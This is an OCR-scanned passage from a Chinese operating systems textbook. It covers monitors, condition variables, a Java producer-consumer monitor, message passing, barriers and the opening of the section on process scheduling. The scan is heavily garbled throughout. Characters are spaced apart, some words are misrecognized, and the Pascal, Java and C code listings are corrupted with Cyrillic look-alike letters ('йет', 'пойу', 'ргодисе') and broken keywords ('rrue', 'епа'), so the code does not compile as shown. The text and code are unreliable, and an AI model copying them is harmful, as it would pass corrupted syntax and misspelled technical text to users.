两 人 提出 的 方案 略 有 不 同 。 一 个 管 程 是 一 个 由 过 程 、 变 
量 及 数据 结构 等 组 成 的 一 个 集合 ， 它 们 组 成 一 个 特殊 的 
模块 或 软件 包 。 进 程 可 在 任何 需要 的 时 候 调 用 管 程 中 的 
过 程 ， 但 它们 不 能 在 管 程 之 外 声明 的 过 程 中 直接 访问 管 
程 内 的 数据 结构 。 图 2-33 展 示 了 用 一 种 抽象 的 、 类 Pascal 
语言 描述 的 管 程 。 这 里 不 能 使 用 C 语 言 ， 因 为 管 程 是 语 
言 概念 而 C 语 言 并 不 支持 它 。 

管 程 有 一 个 很 重要 的 特性 ， 即 任 一 时 刻 管 程 中 只 
能 有 一 个 活跃 进程 ， 这 一 特性 使 管 程 能 有 效 地 完成 互 
斥 。 管 程 是 编程 语言 的 组 成 部 分 ， 编 译 器 知道 它们 的 特殊 
性 ， 因 此 可 以 采用 与 其 他 过 程 调用 不 同 的 方法 来 处 理 对 管 
程 的 调用 。 典 型 的 处 理 方法 是 ， 当 一 个 进程 调用 管 程 过 程 
时 ， 该 过 程 中 的 前 几 条 指令 将 检查 在 管 程 中 是 否 有 其 他 的 
活跃 进程 。 如 果 有 ， 调 用 进程 将 被 挂 起 ， 直 到 另 一 个 进程 
离开 管 程 将 其 唤醒 。 如 果 没 有 活跃 进程 在 使 用 管 程 ， 则 该 
调用 进程 可 以 进入 。 

进入 管 程 时 的 互 斥 由 编译 器 负责 ， 但 通常 的 做 法 是 用 
一 个 互 斥 量 或 二 元 信号 量 。 因 为 是 由 编译 器 而 非 程序 员 来 
安排 互 斥 ， 所 以 出 错 的 可 能 性 要 小 得 多 。 在 任 一 时 刻 ， 写 
管 程 的 人 无 须 关心 编译 器 是 如 何 实现 互 斥 的 。 他 只 需 知道 
将 所 有 的 临界 区 转换 成 管 程 过 程 即 可 ， 决 不 会 有 两 个 进程 
同时 执行 临界 区 中 的 代码 。 

尽管 如 我 们 上 边 所 看 到 的 ， 管 程 提供 了 一 种 实现 互 
斥 的 简便 途径 ， 但 这 还 不 够 。 我 们 还 需要 一 种 办 法 使 得 进 
程 在 无 法 继续 运行 时 被 阻塞 。 在 生产 者 -消费 者 问题 中 ， 
很 容易 将 针对 缓冲 区 满 和 缓冲 区 空 的 测试 放 到 管 程 过 程 
中 ， 但 是 生产 者 在 发 现 缓冲 区 满 的 时 候 如 何 阻塞 呢 ? 

解决 的 方法 是 引入 条 件 变量 (condition variables) 
以 及 相关 的 两 个 操作 : wait 和 signal。 当 一 个 管 程 过 程 发 
现 它 无 法 继续 运行 时 (例如 ， 生 产 者 发 现 缓冲 区 满 )， 它 
会 在 某 个 条 件 变 量 上 (如 full) 执行 wait 操 作 。 该 操作 导 
致 调用 进程 自身 阻塞 ， 并 且 还 将 另 一 个 以 前 等 在 管 程 之 外 
的 进程 调 入 管 程 。 在 前 面 介 绍 pthread 时 我 们 已 经 看 到 条 
件 变量 及 其 操作 了 。 

另 一 个 进程 ， 比 如 消费 者 ， 可 以 唤醒 正在 睡眠 的 伙 
伴 进程 ， 这 可 以 通过 对 其 伙伴 正在 等 待 的 一 个 条 件 变量 执 
行 signal 完 成 。 为 了 避免 管 程 中 同时 有 两 个 活跃 进程 ， 我 
们 需要 一 条 规则 来 通知 在 signal 之 后 该 怎么 办 。Hoare 建 
议 让 新 唤醒 的 进程 运行 ， 而 挂 起 另 一 个 进程 。Brinch 
Hansen 则 建议 执行 signal 的 进程 必须 立即 退出 管 程 ， 即 


monitor example 
integer i; 
condition c; 


procedure producert ): 
end; 


procedure consumer( ): 


епа; 
end monitor; 


图 2-33 管 程 


monitor ProducerConsumer 
condition full, empty: 
integer counr: 
procedure inser item: integer); 


if count = N then wait(full); 

insert_item item): 

count := count 十 | 

if count = 1 then signal(empty) 
end: 


function remove: integer: 
begin 
if count = 0 then wait(empty); 
remove = remove йет; 
count := count — 1; 
if count = N ~ | then signal(full) 


count := 0; 
end monitor; 


procedure producer: 
begin 


while rrue do 
begin 
йет = produce _item; 
ProducerConsumer.insert(item) 
end 
end; 
procedure consumer: 
begin 
while rrue do 
item = ProducerConsumer. remove: 
consume _йет(йет) 


end; 


图 2-34 用 管 程 实现 的 生产 者 -消费 者 问题 
的 解法 框架 。 一 次 只 能 有 一 个 管 程 过 程 活跃 。 
其 中 的 缓冲 区 有 N 个 杠 
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signal 语 句 只 可 能 作为 一 个 管 程 过 程 的 最 后 一 条 语句 。 我 们 将 采纳 Brinch Hansen 的 建议 ， 因 为 它 在 概念 
上 更 简单 ， 并 且 更 容易 实现 。 如 果 在 一 个 条 件 变 量 上 有 若干 进程 正在 等 待 ， 则 在 对 该 条 件 变量 执行 
后 ， 系 统 调度 程序 只 能 在 其 中 选择 一 个 使 其 恢复 运行 。 

还 有 一 个 Hoare 和 Brinch Hansen 都 没有 提 及 的 第 三 种 方法 ， 该 方法 让 发 信号 者 继续 运 
行 ， 并 且 只 有 在 发 信号 者 退出 管 程 之 后 ， 才 允许 等 待 的 进程 开始 运行 。 

条 件 变量 不 是 计数 器 ， 条 件 变量 也 不 能 像 信号 量 那样 积累 信号 以 便 以 后 使 用 。 所 以 ， 如 果 向 一 个 条 
件 变量 发 送信 号 ， 但 是 在 该 条 件 变量 上 并 没有 等 待 进程 ， 则 该 信号 会 永远 丢失 。 换 句 话说 ，wait 操 作 必 
须 在 signal 之 前 。 这 条 规则 使 得 实现 简单 了 许多 。 实 际 上 这 不 是 一 个 问题 ， 因 为 在 需要 时 ， 用 变量 很 容易 
跟踪 每 个 进程 的 状态 。 一 个 原本 要 执行 signal 的 进程 ， 只 要 检查 这 些 变量 便 可 以 知道 该 操作 是 否 有 必要 。 

在 图 2-34 中 给 出 了 用 类 Pascal 语 言 ， 通 过 管 程 实现 的 生产 者 -消费 者 问题 的 解法 框架 。 使 用 类 Pascal 

于 清晰 、 简 单 ， 并 且 严格 符合 Hoare/Brinch Hansen 模 型 。 
会 觉得 wait 和 signal 操 作 看 起 来 像 前 面 提 到 的 sleep 和 wakeup ， 而 我 们 已 经 看 到 后 者 存在 
严重 的 竞争 条 件 。 是 的 ， 它 们 确实 很 像 ， 但 是 有 个 很 关键 的 区 别 : sleep 和 wakeup 之 所 以 失败 是 因为 当 
一 个 进程 想 睡眠 时 另 一 个 进程 试图 去 唤醒 它 。 使 用 管 程 则 不 会 发 生 这 种 情况 。 对 管 程 过 程 的 自动 互 斥 保 
证 了 这 - 如 果 管 程 过 程 中 的 生产 者 发 现 缓冲 区 满 ， 它 将 能 够 完成 wait 操 作 而 不 用 担心 调度 程序 可 能 
会 在 wait 完 成 之 前 切换 到 消费 者 。 甚 至 ， 在 wait 执 行 完成 而 且 把 生产 者 标志 为 不 可 运行 之 前 ， 根 本 不 会 
允许 消费 者 进入 管 程 。 

尽管 类 Pascal 是 一 种 想象 的 语言 ， 但 还 是 有 一 些 真正 的 编程 语言 支持 管 程 ， 不 过 它们 不 一 定 是 
Hoare 和 Brinch Hansen 所 设计 的 模型 。 其 中 一 种 语言 是 Java。Java 是 一 种 面向 对 象 的 语言 ， 它 支持 用 户 
级 线程 ， 还 允许 将 方法 (过 程 ) 划分 为 类 。 只 要 将 关键 词 synchronized 加 入 到 方法 声明 中 ，Java 保证 一 
旦 某 个 线程 执行 该 方法 ， 就 不 允许 其 他 线程 执行 该 对 象 中 的 任何 synchronized 方 法 。 

使 用 Java 管 程 解决 生产 者 -消费 者 问题 的 解法 如 图 2-35 所 示 。 该 解法 中 有 4 个 类 。 外 部 类 (outer 
class) ProducerConsumer 创 建 并 启动 两 个 线程 ， p 和 c。 第 二 个 类 和 第 三 个 类 producer 和 consumer 分 别 包 
含 生产 者 和 消费 者 的 代码 。 最 后 ， 类 our_monitor 是 管 程 ， 它 有 两 个 同步 线程 ， 用 于 在 共享 缓冲 区 中 插入 
和 取出 数据 项 。 与 前 面 的 例子 不 同 ， 我 们 在 这 里 给 出 了 insert 和 remove 的 全 部 代码 。 

在 前 面 所 有 的 例子 中 ， 生 产 者 和 消费 者 线程 在 功能 上 与 它们 的 等 同 部 分 是 相同 的 。 生 产 者 有 一 个 无 
限 循环 ， 该 无 限 循环 产生 数据 并 将 数据 放 人 公共 缓冲 区 中 ， 消 费 者 也 有 一 个 等 价 的 无 限 循 环 ， 该 无 限 循 
环 从 公共 缓冲 区 取出 数据 并 完成 一 些 有 趣 的 工作 。 

该 程序 中 比较 意思 的 部 分 是 类 our_monitor， 它 包含 缓冲 区 、 管 理 变量 以 及 两 个 同步 方法 。 当 生产 
者 在 insert 内 活动 时 ， 它 确信 消费 者 不 能 在 remove 中 活动 ， 从 而 保证 更 新 变量 和 缓冲 区 的 安全 ， 且 不 用 
担心 竞争 条 件 。 变 量 count 记 录 在 缓冲 区 中 数据 项 的 数量 。 它 的 取 值 可 以 取 从 0 到 N- 1 之 间 任 何 值 。 变 量 
lo 是 缓冲 区 横 的 序号 ， 指 出 将 要 取出 的 下 一 个 数据 项 。 类 似 地 ，hi 是 缓冲 区 中 下 一 个 将 要 放 入 的 数据 项 
序号 。 允 许 lo = 所， 其 含义 是 在 缓冲 区 中 有 0 个 或 N 个 数据 项 。count 的 值 说 明了 究竟 是 哪 一 种 情形 。 

Java 中 的 同步 方法 与 其 他 经 典 管 程 有 本 质 差别 : Java 没 有 内 嵌 的 条 件 变量 。 反 之 ，Java 提 供 了 两 个 
过 程 wait 和 notify ， 分 别 与 sleep 和 wakeup 等 价 ， 不 过 ， 当 它们 在 同步 方法 中 使 用 时 ， 它 们 不 受 竞争 条 
件 约束 。 理 论 上 ， 方 法 wait 可 以 被 中 断 ， 它 本 身 就 是 与 中 断 有 关 的 代码 。Java 需 要 显 式 表示 异常 处 理 。 
在 本 文 的 要 求 中 ， 只 要 认为 go_to_sleep 就 是 去 睡眠 即 可 。 

通过 临界 区 互 斥 的 自动 化 ， 管 程 比 信号 量 更 容易 保证 并 行 编程 的 正确 性 。 但 管 程 也 有 缺点 。 我 们 之 
所 以 使 用 类 Pascal 和 Java， 而 不 像 在 本 书 中 其 他 例子 那样 使 用 C 语 言 ， 并 不 是 没有 原因 的 。 正 如 我 们 前 面 
提 到 过 的 ， 管 程 是 一 个 编程 语言 概念 ， 编 译 器 必须 要 识别 管 程 并 用 某 种 方式 对 其 互 斥 做 出 安排 。C、 
Pascal 以 及 多 数 其 他 语言 都 没有 管 程 ， 所 以 指望 这 些 编译 器 遵守 互 斥 规 则 是 不 合理 的 。 实 际 中 ， 如 何 能 
让 编译 器 知道 哪些 过 程 属于 管 程 ， 哪 些 不 属于 管 程 呢 ? 

在 上 述 语言 中 同样 也 没有 信号 量 ， 但 增加 信号 量 是 很 容易 的 : 读者 需要 做 的 就 是 向 库 里 加 入 两 段 短 
小 的 汇编 程序 代码 ， 以 执行 up 和 down 系 统 调用 。 编 译 器 甚至 用 不 着 知道 它们 的 存在 。 当 然 ， 操 作 系 统 
必须 知道 信号 量 的 存在 ， 或 至 少 有 一 个 基于 信号 量 的 操作 系统 ， 读 者 仍旧 可 以 使 用 C 或 C++ (甚至 是 汇 
编 语言 ， 如 果 读 者 乐意 的 话 ) 来 编写 用 户 程序 ， 但 是 如 果 使 用 管 程 ， 读 者 就 需要 一 种 带 有 管 程 的 语言 。 
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public class ProducerConsumer { 
static final int № = 100; 。 /定义 缓冲 区 大 小 的 常量 
Static producer р = new producer(); // 初始 化 一 个 新 的 生产 者 线程 
static consumer с = new consumer( ); // 初始 化 一 个 新 的 消费 者 线程 
static our_ monitor топ = пем our_monitor(); // 初始 化 一 个 新 的 管 程 


public static void main(String args[]){ 
р.віап(); /开始 生产 者 线程 
i cstart() // 开始 消费 者 线程 


static class producer extends Thread { 
public void run() {// run 方 法 包含 了 线程 代码 
int йет; 
while (true) { / 生产 者 循环 
Пет = produce_item( ); 
mon.insert(item); 


} 
private int ргодисе item() {...) /实际 生产 
} 


static class consumer extends Thread { 
public void run() {// run 方 法 包含 了 线程 代码 
int йет; 
while (true) { // 消费 者 循环 
item = mon.remove( ); 
сопвите йет (йет); 
} 


} 
private void consume_item(int йет) { ... }// 实际 消费 


static class our_monitor { // 这 是 一 个 管 程 

private int buffer ] = new int{N]; 

private int count = 0, lo = 0, ; и 计数 器 和 索引 

public synchronized void insert(int val) { 

1 (count == №) go_to_sleep() /如 果 缓 冲 区 满 ， 则 进入 休眠 

; 向 缓冲 区 中 插入 一 个 新 的 数据 项 
:设置 下 一 个 数据 项 的 档 

count = count + 1; /缓冲 区 中 的 数据 项 又 多 了 一 项 
) i (count == 1) пойу(); “Гада ЕКЕ, 则 将 其 唤醒 
public synchronized int remove( ) { 

int val; 

И (count == 0) go _to_sleep(); /如 果 缓 冲 区 空 ， 进 入 休眠 

val = buffer [о]; / 从 缓冲 区 中 取出 一 个 数据 项 

ю= (0+1) № /设置 待 取 数 据 项 的 模 

count = count ~ 1; / 缓冲 区 中 的 数据 项 数目 减少 1 

it ama М- 1) пойу(); N д EREKE, WIERNE 

retum val; 


) 
) private void до. to_sleep( ) { try{wait( );} catch(InterruptedException exc) {};} 


图 2-35 用 Java 语 言 实现 的 生产 者 -消费 者 问题 的 解法 


与 管 程 和 信号 量 有 关 的 另 一 个 问题 是 ， 这 些 机 制 都 是 设计 用 来 解决 访问 公共 内 存 的 一 个 或 多 个 CPU 
上 的 互 斥 问题 的 。 通过 将 信号 量 放 在 共享 内 存 中 并 用 TSL 或 XCHG 指 令 来 保护 它们 ， 可 以 避免 竞争 。 如 
果 一 个 分 布 式 系统 具有 多 个 CPU， 并 且 每 个 CPU 拥 有 自己 的 私有 内 存 ， 它们 通过 一 个 局 域 网 相连 ， 那 么 
这 些 原 语 将 失效 。 这 里 的 结论 是 : 信号 量 太 低级 了 ， 而 管 程 在 少数 几 种 编程 语言 之 外 又 无 法 使 用 ， 并 且 ， 
这 些 原 语 均 未 提供 机 器 间 的 信息 交换 方法 。 所 以 还 需要 其 他 的 方法 。 
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23.8 消息 传递 

上 面 提 到 的 其 他 的 方法 就 是 消息 传递 (message passing)。 这 种 进程 间 通信 的 方法 使 用 两 条 原 语 
send 和 receive， 它 们 像 信 号 量 而 不 像 管 程 ， 是 系统 调用 而 不 是 语言 成 分 。 因 此 ， 可 以 很 容易 地 将 它们 
加 入 到 库 例 程 中 去 。 例 如 : 


send(destination, &message); 


和 

receive(source, &message); 
前 一 个 调用 向 一 个 给 定 的 目标 发 送 一 条 消息 ， 后 一 个 调用 从 一 个 给 定 的 源 (或 者 是 任意 源 ， 如 果 接 收 者 
不 介意 的 话 ) 接收 一 条 消息 。 如 果 没 有 消息 可 用 ， 则 接收 者 可 能 被 阻塞 ， 直 到 一 条 消息 到 达 ， 或 者 ， 带 
着 一 个 错误 码 立即 返回 。 

1 .消息 传递 系统 的 设计 要 点 

消息 传递 系统 面临 着 许多 信号 量 和 管 程 所 未 涉及 的 问题 和 设计 难点 ， 特 别 是 位 于 网 络 中 不 同 机 器 上 
的 通信 进程 的 情况 。 例 如 ， 消 息 有 可 能 被 网 络 丢失 。 为 了 防止 消息 丢失 ， 发 送 方 和 接收 方 可 以 达成 如 下 
一 致 : 一 旦 接收 到 信息 ， 接 收 方 马 上 回 送 一 条 特殊 的 确认 (acknowledgement) 消息 。 如 果 发 送 方 在 一 
段 时 间 间 隔 内 未 收 到 确认 ， 则 重 发 消息 。 

现在 考虑 消息 本 身 被 正确 接收 ， 而 返回 给 发 送 者 的 确认 信息 丢失 的 情况 。 发 送 者 将 重 发 信息 ， 这 样 
接收 者 将 接收 到 两 次 相同 的 消息 。 对 于 接收 者 来 说 ， 如 何 区 分 新 的 消息 和 一 条 重 发 的 老 消息 是 非常 重要 
的 。 通 常 采用 在 每 条 原始 消息 中 嵌入 一 个 连续 的 序号 来 解决 此 问题 。 如 果 接收 者 收 到 一 条 消息 ， 它 具有 
与 前 面 某 一 条 消息 一 样 的 序号 ， 就 知道 这 条 消息 是 重复 的 ， 可 以 忽略 。 不 可 靠 消息 传递 中 的 成 功 通信 问 
题 是 计算 机 网 络 的 主要 研究 内 容 。 更 多 的 信息 可 以 参考 相关 文献 (Tanenbaum, 1996), 

消息 系统 还 需要 解决 进程 命名 的 问题 ， 在 send 和 receive 调 用 中 所 指定 的 进程 必须 是 没有 二 义 性 的 。 
身份 认证 (authentication) 也 是 一 个 问题 。 比 如 ， 客 户 机 怎么 知道 它 是 在 与 一 个 真正 的 文件 服务 器 通信 ， 
而 不 是 与 一 个 冒充 者 通信 ? 

对 于 发 送 者 和 接收 者 在 同一 台 机 器 上 的 情况 ， 也 存在 若干 设计 问题 。 其 中 一 个 设计 问题 就 是 性 能 问 
题 。 将 消息 从 一 个 进程 复制 到 另 一 个 进程 通常 比 信号 量 操作 和 进入 管 程 要 慢 。 为 了 使 消息 传递 变 得 高 效 ， 
人 们 已 经 做 了 许多 工作 。 例 如 ，Cheriton (1984) 建议 限制 信息 的 大 小 ， 使 其 能 装 入 机 器 的 寄存 器 中 ， 
然后 便 可 以 使 用 寄存 器 进行 消息 传递 。 

2. 用 消息 传递 解决 生产 者 一 消费 者 问题 

现在 我 们 来 考察 如 何 用 消息 传递 而 不 是 共享 内 存 来 解决 生产 者 -消费 者 问题 。 在 图 2-36 中 ， 我 们 给 
出 了 一 种 解法 。 假 设 所 有 的 消息 都 有 同样 的 大 小 ， 并 且 在 尚未 接收 到 发 出 的 消息 时 ， 由 操作 系统 自动 进 
行 缓冲。 在 该 解决 方案 中 共 使 用 N 条 消息 ， 这 就 类 似 于 一 块 共 享 内 存 缓冲 区 中 的 N 个 醒 。 消 费 者 首先 将 N 
条 空 消息 发 送 给 生产 者 。 当 生产 者 向 消费 者 传递 一 个 数据 项 时 ， 它 取 走 一 条 空 消息 并 送 回 一 条 填充 了 内 
容 的 消息 。 通 过 这 种 方式 ， 系 统 中 总 的 消息 数 保持 不 变 ， 所 以 消息 都 可 以 存放 在 事先 确定 数量 的 内 存 中 。 

如 果 生 产 者 的 速度 比 消费 者 快 ， 则 所 有 的 消息 最 终 都 将 被 填 满 ， 等 待 消费 者 ， 生 产 者 将 被 阻 罕 ， 等 
待 返回 一 条 空 消息 。 如 果 消 费 者 速度 快 ， 则 情况 正好 相反 所 有 的 消息 均 为 空 ， 等 待 生产 者 来 填充 它们 ， 
消费 者 被 阻塞 ， 以 等 待 一 条 填充 过 的 消息 。 

消息 传递 方式 可 以 有 许多 变 体 。 我 们 首先 介绍 如 何 对 消息 进行 编 址 。 一 种 方法 是 为 每 个 进程 分 配 一 
个 惟一 的 地 址 ， 让 消息 按 进程 的 地 址 编 址 。 另 一 种 方法 是 引入 一 种 新 的 数据 结构 ， 称 作 信箱 (mailbox), 
信箱 是 一 个 用 来 对 一 定数 量 的 消息 进行 缓冲 的 地 方 ， 信 箱 中 消息 数量 的 设置 方法 也 有 多 种 ， 典 型 的 方法 
是 在 信箱 创建 时 确定 消息 的 数量 。 当 使 用 信箱 时 ， 在 send 和 receive 调 用 中 的 地 址 参数 就 是 信箱 的 地 址 ， 
而 不 是 进程 的 地 址 。 当 一 个 进程 试图 向 一 个 满 的 信箱 发 消息 时 ， 它 将 被 挂 起 ， 直 到 信箱 内 有 消息 被 取 走 ， 
从 而 为 新 消息 腾 出 空间 。 

对 于 生产 者 -消费 者 问题 ， 生 产 者 和 消费 者 均 应 创建 足够 容纳 N 条 消息 的 信箱 。 生 产 者 向 消费 者 信 
箱 发 送 包 含 实际 数据 的 消息 ， 消 费 者 则 向 生产 者 信箱 发 送 空 的 消息 。 当 使 用 信箱 时 ， 缓 冲 机 制 的 作用 是 
很 清楚 的 : 目标 信箱 容纳 那些 已 被 发 送 但 尚未 被 目标 进程 接收 的 消息 。 
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#define N 100 
void ргоаџсег(уоіа) 
( 


int йет; 
message т; 


while (TRUE) { 
item = produce_item( ); 
receive(consumer, &m); 
build_message(&m, йет); 
send(consumer, &m); 
} 
} 


void consumer(void) 


int йет, i; 
message m; 


for (i = 0; i < N; i++) send(producer &m); 


while (TRUE) { 


ОФА */ 


е 消息 缓冲 区 */ 


让 产生 放 入 缓冲 区 的 一 些 数据 */ 
/* 等 待 消费 者 发 送 空 缓冲 区 */ 
ї* 建立 一 个 待 发 送 的 消息 */ 

广发 送 数据 项 给 消费 者 */ 


广发 送 N 个 空 缓冲 区 */ 


гесеіуе(ргодисег, &т); 六 接收 包含 数据 项 的 消息 */ 
item = extract _item(&m); 人 * 将 数据 项 从 消息 中 提取 出 来 */ 
send(producer, &m); 广 将 空 缓冲 区 发 送 回 生产 者 */ 
consume _йет(йет); Ie 处 理 数据 项 */ 


} 
} 


图 2-36 用 N 条 消息 实现 的 生产 者 -消费 者 问题 


使 用 信箱 的 另 一 种 极端 方法 是 彻底 取消 缓冲 。 采 用 这 种 方法 时 ， 如 果 send 在 receive 之 前 执行 ， 则 
发 送 进程 被 阻塞 ， 直 到 receive 发 生 。 在 执行 receive 时 ， 消息 可 以 直接 从 发 送 者 复制 到 接收 者 ， 不 用 任 
何 中 间 缓冲 。 类 似 地 ， 如 果 先 执行 receive， 则 接收 者 会 被 阻塞 ， 直到 send 发 生 。 这 种 方案 常 被 称 为 会 
合 (rendezvous)。 与 带 有 缓冲 的 消息 方案 相 比 ， 该 方案 实现 起 来 更 容易 一 些 ， 但 却 降低 了 灵活 性 ， 因 为 
发 送 者 和 接收 者 一 定 要 以 步 步 紧 接 的 方式 运行 。 

通常 在 并 行程 序 设计 系统 中 使 用 消息 传递 。 例 如 ， 一 个 著名 的 消息 传递 系统 是 消息 传递 接口 
(Message-Passing Interface，MPI)， 它 广泛 应 用 在 科学 计算 中 。 有 关 该 系统 的 更 多 信息 ， 可 参考 相关 文 
献 (Gropp 等 人 ，1994，Snir 等 人 ，1996)。 


2.3.9 屏障 

最 后 一 个 同步 机 制 是 准备 用 于 进程 组 而 不 是 用 于 双 进 程 的 生产 者 -消费 者 类 情形 的 。 在 有 些 应 用 中 
划分 了 若干 阶段 并且 规定 ， 除非 所 有 的 进程 都 就 绪 准备 着 手下 一 个 阶段 ， 否则 任何 进程 都 不 能 进入 下 
一 个 阶段 。 可 以 通过 在 每 个 阶段 的 结尾 安置 屏障 (barrier) 来 实现 这 种 行为 。 当 一 个 进程 到 达 屏 障 时 ， 
它 就 被 屏障 阻 搓 ， 直 到 所 有 进程 都 到 达 该 屏障 为 止 。 屏障 的 操作 如 图 2-37 所 示 。 

在 图 2-37a 中 可 以 看 到 有 四 个 进程 接近 屏障 ， 这 意味 着 它们 正在 运算 ， 但 是 还 没有 到 达 每 个 阶段 的 
结尾 。 过 了 一 会 儿 ， 第 一 个 进程 完成 了 所 有 需要 在 第 一 阶段 进行 的 计算 。 它 接着 执行 barrier 原 语 ， 这 通 
常 是 调用 一 个 库 过 程 。 于 是 该 进程 被 挂 起 。 一 会 儿 ， 第 二 个 和 个 进程 也 完成 了 第 一 阶段 的 计算 ， 也 
接着 执行 barrier 原 语 。 这 种 情形 如 图 2-37b 所 示 。 结 果 ， 当 最 后 一 个 进程 C 到 达 屏障 时 ， 所 有 的 进程 就 一 
起 被 释放 ， 如 图 2-37c 所 示 。 

作为 一 个 需要 屏障 的 例子 ， 考 虑 在 物理 或 工程 中 的 一 个 典型 凶 耶 问题 。 这 是 一 个 带 有 初 值 的 矩阵 。 
这 些 值 可 能 代表 一 块 金属 板 上 各 个 点 的 温度 值 。 基本 想法 可 以 是 准备 计算 如 下 的 问题 要 花费 多 长 时 间 ， 
在 一 个 角 上 的 火焰 才能 传播 到 整个 板 上 。 

计算 从 当前 值 开始 ， 先 对 和 矩阵 进行 一 个 变换 ， 从 而 得 到 第 二 个 矩阵 ， 例如 ， 运 用 热力 学 定律 考察 在 
AT 之 后 的 整个 温度 分 布 。 然 后 ,进程 不 断 重复 , 随 着 金属 板 的 加 热 ， 给 出 样本 点 温度 随时 间 变 化 的 函数 。 
该 算法 从 而 随时 间 变 化 生成 出 一 系列 矩阵 。 
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图 2-37 屏障 的 使 用 : а) 进程 接近 屏障 ，b) 除了 一 个 之 外 所 有 的 进程 都 被 
屏障 阻塞 ，*) 当 最 后 一 个 进程 到 达 屏障 时 ， 所 有 的 进程 一 起 通过 


现在 ， 我 们 设想 这 个 矩阵 非常 之 大 (比如 100 万 行 乘 以 100 万 列 )， 所 以 需要 并 行 处 理 ( 可 能 在 一 台 
多 处 理 器 上 ) 以 便 加 速 运算 。 各 个 进程 工作 在 这 个 矩阵 的 不 同 部 分 ， 并 且 从 老 的 矩阵 按照 物理 定律 计算 
新 的 矩阵 元 素 。 但 是 ， 除 非 第 n 次 迁 代 已 经 完成 ， 也 就 是 说 ， 除 非 所 有 的 进程 都 完成 了 当前 的 工作 ， 否 
则 没有 进程 可 以 开始 第 n + I 次 迭代 。 实 现 这 一 目标 的 方法 是 通过 编程 使 每 一 个 进程 在 完成 当前 迁 代 部 分 
后 执行 一 个 barrier 操 作 。 只 有 当 全 部 进程 完成 工作 之 后 ， 新 的 矩阵 (下 一 次 选 代 的 输入 ) 才 会 完成 ， 此 
时 所 有 的 进程 会 被 释放 而 开始 新 的 迭代 过 程 。 


2.4 调度 

当 计 算 机 系统 是 多 道 程序 设计 系统 时 ， 通常 就 会 有 多 个 进程 或 线程 同时 竞争 CPU。 只 要 有 两 个 或 更 
多 的 进程 处 于 就 绪 状态 ， 这 种 情形 就 会 发 生 。 如 果 只 有 一 个 CPU 可 用 ， 那么 就 必须 选择 下 一 个 要 运行 的 
进程 。 在 操作 系统 中 ， 完 成 选择 工作 的 这 一 部 分 称 为 调度 程序 (scheduler) ， 该 程序 使 用 的 算法 称 为 调 
Šik (scheduling algorithm), 

尽管 有 一 些 不 同 ， 但 许多 适用 于 进程 调度 的 处 理 方法 也 同样 适用 于 线程 调度 。 当 内 核 管理 线程 的 时 
使 ， 调 度 经 常 症 按 线程 级 别 的 ， 与 线程 所 属 的 进程 基本 或 根本 没有 关联 。 面 我 们 将 首先 关注 适用 于 进 
程 与 线程 两 者 的 调度 问题 ， 然后 会 明确 地 介绍 线程 调度 以 及 它 所 产生 的 独特 问题 。 第 8 章 将 讨论 多 核 芯 
片 的 问题 。 
2.4.1 调度 介绍 

让 我 们 回 到 早期 以 磁带 上 的 卡片 作为 输入 的 批 处 理 系统 时 代 ， 那 时 的 调度 算法 很 简单 ， 依 次 运行 磁 
带 上 的 每 一 个 作业 。 对 于 多 道 程序 设计 系统 ， 调 度 算法 要 复杂 一 些 ， 因为 经 常 有 多 个 用 户 等 候 服务 。 有 
些 大 型 机 系统 仍旧 将 批 处 理 和 分 时 服务 结合 使 用 ， 需要 调度 程序 决定 下 一 个 运行 的 是 一 个 批 处 理 作业 还 
是 终端 上 的 一 个 交互 用 户 。 (顺便 提 及 ， 一 个 批 处 理 作业 可 能 需要 连续 运行 多 个 程序 ， 不 过 在 本 节 中 ， 
我 们 假设 它 只 是 一 个 运行 单个 程序 的 请 求 。) 由 于 在 这 些 机 器 中 ，CPU 是 稀缺 资源 ， 所 以 好 的 调度 程序 
可 以 在 提高 性 能 和 用 户 的 满意 度 方面 取得 很 大 的 成 果 。 因 此 ， 大 量 的 研究 工作 都 花费 在 创造 聪明 而 有 效 
的 调度 算法 上 了 。 

在 拥有 了 个 人 计算 机 的 优势 之 后 ， 整 个 情形 向 两 个 方面 发 展 。 首先， 在 多 数 时 间 内 只 有 一 个 活动 进程 。 
一 个 用 户 进入 文字 处 理 软件 编辑 一 个 文件 时 ， 一 般 不 会 同时 在 后 台 编 译 一 个 程序 。 在 用 户 向 文字 处 理 软件 
键入 一 条 命令 时 ， 调度 程序 不 用 做 多 少 工作 来 判定 哪个 进程 要 运行 -一 -惟一 的 候选 者 是 文字 处 理 软件 。 

其 次 ， 同 CPU 是 稀缺 资源 时 的 年 代 相 比 ， 现 在 计算 机 速度 极 快 。 个 人 计算 机 的 多 数 程序 受到 的 是 用 
户 当前 输入 速率 (键入 或 敲 击 鼠 标 ) 的 限制 ， 而 不 是 CPU 处 理 速率 的 限制 。 即便 对 于 编译 (这 是 过 去 
CPU 周期 的 主要 消耗 者 ) 现在 大 多 数 情况 下 也 只 要 花费 仅仅 几 秒 钟 。 甚 至 两 个 实际 同时 运行 的 程序 ， 诸 
如 一 个 文字 处 理 软件 和 一 个 电子 表单 ， 由 于 用 户 在 等 待 两 者 完成 工作 ， 因 此 很 难说 需要 哪 一 个 先 完成 。 
这 样 的 结果 是 ， 调 度 程序 在 简单 的 PC 机 上 并 不 重要 。 当 然 ， 总 有 应 用 程序 会 实际 消耗 挤 CPU， 例 如 ， 为 
绘制 一 小 时 高 精度 视频 而 调整 108 000 帧 (NTSC 制 ) 或 90 000 帧 (PAL 制 ) 中 的 每 一 帧 颜色 就 需要 大 量 
工业 强度 的 计算 能 力 。 然 而 ， 类 似 的 应 用 程序 不 在 我 们 的 考虑 范围。 
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当 我 们 转向 网 络 服务 器 时 ， 情 况 略微 有 些 改变 。 这 里 ， 多 个 进程 经 常 竞争 CPU， 因 此 调度 功能 再 一 
次 变 得 至 关 重要 。 例 如 ， 当 CPU 必须 在 运行 一 个 收集 每 日 统计 数据 的 进程 和 服务 用 户 需求 的 进程 之 间 进 
行 选择 的 时 候 ， 如 果 后 者 首先 占用 了 CPU， 用 户 将 会 更 高 兴 。 

另外 ， 为 了 选取 正确 的 进程 运行 ， 调 度 程序 还 要 考虑 CPU 的 利用 率 ， 因 为 进程 切换 的 代价 是 比较 高 
的 。 首 先 用 户 态 必须 切换 到 内 核 态 ， 然 后 要 保存 当前 进程 的 状态 ， 包 括 在 进程 表 中 存储 寄存 器 值 以 便 以 
后 重新 装载 。 在 许多 系统 中 ， 内 存 映 像 (例如 ， 页 表 内 的 内 存 访问 位 ) 也 必须 保存 ， 接 着 ， 通 过 运行 调 
